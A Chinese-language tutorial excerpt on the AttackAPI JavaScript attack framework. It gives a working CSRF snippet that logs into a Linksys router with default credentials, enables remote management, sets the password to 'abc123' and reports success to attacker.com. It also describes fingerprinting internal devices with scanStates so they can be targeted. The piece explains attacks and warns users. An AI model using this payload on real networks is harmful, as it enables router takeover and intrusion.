精通JavaScript攻击框架：AttackAPI（下）

核心提示： 攻击对用户来说总是不可见的，如果认证得手，精通JavaScript攻击框架：AttackAPI（下）(5)，端口8080就会启用，这样就可以通过因特网来使用其管理接口了，如果其中有一些具有XSS或者CSRF漏洞，那么攻击者就可以针对性的发动攻击，这时，边界路由器以及所有该网络中的机器都已经

攻击对用户来说总是不可见的。如果认证得手，端口8080就会启用，这样就可以通过因特网来使用其管理接口了。这时，边界路由器以及所有该网络中的机器都已经完全落入攻击者手中。

攻击者可能想要做的事情是发送一个配置消息，指出该用户的路由器已经被攻陷了，如下所示：

$A.requestCSRF({
method: ‘POST’
url: (‘http://admin:admin@’+ $A.getInternalIP() ).replace(/.d+$/, ‘.1’) +
‘/setup.cgi’,
query: {
remote_management: ‘enable’,
sysPasswd: ‘abc123’,
sysConfi rmPasswd: ‘abc123’
},
onload: function () {
$A.requestIMG(‘http://attacker.com/confi rm_compromised.php’);
}
});

下面是一个真实的攻击，并且会对Linksys的无线路由器造成损害。一旦攻击者潜入您所在的网络，他们就能够做其他的事情，例如识别不同的本地设备，并尽可能地收集更多的信息。所以用户不应该信赖来自任意页面的JavaScript代码，同时他们应该意识到在没有保护的情况下冲浪所潜在的问题。

在前面部分，我们展示了经过scanStates函数可以发现已经登录的用户。然而，这个函数还有许多其他用途。由于scanStates基于特征码，因此我们可以使用它检测不同的网络设备的类型和版本。特征码是基于远程访问资源时包含一个脚本标签所引起的错误信息的，例如一个不存在的资源导致的错误跟一个由存在的资源所导致的错误是有区别的，这意味着，提供一个足够大的特征数据库，我们就可以检测不同的网络设备、企业网站等等的类型和版本。攻击者能够成功的识别出您的机构的内部网密钥体制的版本。如果其中有一些具有XSS或者CSRF漏洞，那么攻击者就可以针对性的发动攻击，从而取得受害者的会话的永久性的或者非永久性的控制权。